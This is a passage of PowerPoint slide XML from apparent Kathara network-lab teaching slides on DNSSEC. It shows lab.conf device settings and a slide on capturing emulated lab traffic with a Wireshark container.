                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>uniromatre</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r1[0]="A"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r1[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/base"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r1[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[0]="A"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind:9.16"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13322" name="AutoShape 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{280A1B1C-3020-C83C-FCA3-1936C1AE3DCB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2491" y="3333"/>
              <a:ext cx="622" cy="57"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lab.conf</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01221F5B-3C6E-D375-C42C-6C612AF4977B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8236032" y="2965847"/>
            <a:ext cx="3470176" cy="463153"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -62802"/>
              <a:gd name="adj2" fmla="val 157360"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>image for the PHP language</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="279211175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5C445B-BAD8-F2AC-8834-2BC1BAB8AD6B}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18436" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADDF457E-48FA-E1BF-20A6-6CFFE5F0866B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>sniff the traffic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18437" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69EB8678-F530-596D-6072-7F4A7F6196F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
              <a:t>connect the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" noProof="0" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
              <a:t> device to collision domain B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
              <a:t>open any browser on the host machine </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" noProof="0" dirty="0"/>
              <a:t>localhost:3000 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
              <a:t>sniff eth1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D72F4BB7-2CB3-B63F-AE1A-F70164CD808F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D758A89-8D13-927D-529F-0ED8F6DE9EFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D821D27-4251-318C-D639-089B2CC0824B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="609600" y="2191793"/>
            <a:ext cx="10972800" cy="1237207"/>
            <a:chOff x="607480" y="2378845"/>
            <a:chExt cx="10972800" cy="1237207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8FA2AC3-F1D4-BB49-CC82-87287BDA7755}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="607480" y="2668294"/>
              <a:ext cx="10972799" cy="947758"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="40000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="t"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" noProof="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>user@localhost</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:~</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/kithara-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnssec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>$</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lconfig</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -n </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>wireshark</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> --add </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>B</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{898E1ED7-D2DE-0B7F-6873-9FCD6A2C2092}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="607480" y="2378845"/>
              <a:ext cx="10972800" cy="289449"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4472C4"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="25400" algn="l" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="32000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="34" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BA79109-929E-3B52-B27B-5378F95D58F8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10920536" y="2466851"/>
              <a:ext cx="581348" cy="126235"/>
              <a:chOff x="8092857" y="2115830"/>
              <a:chExt cx="581348" cy="126235"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="37" name="Rectangle 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFA5C29B-BB41-8CC8-4357-6259D7D6712B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8548205" y="2116065"/>
                <a:ext cx="126000" cy="126000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000">
                  <a:alpha val="50196"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="4472C4">
                    <a:shade val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:miter lim="800000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40D3B4BC-07F0-9F4E-84AD-31EA3BB37E5A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8092857" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E691907-D4EC-07C8-370E-F3FEAC4BD88E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8320531" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="169863598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83B6EB-53E1-B755-3291-948C7DD97743}"/>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ABBE15F2-67EC-C188-A6A2-AE4817CE8B0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
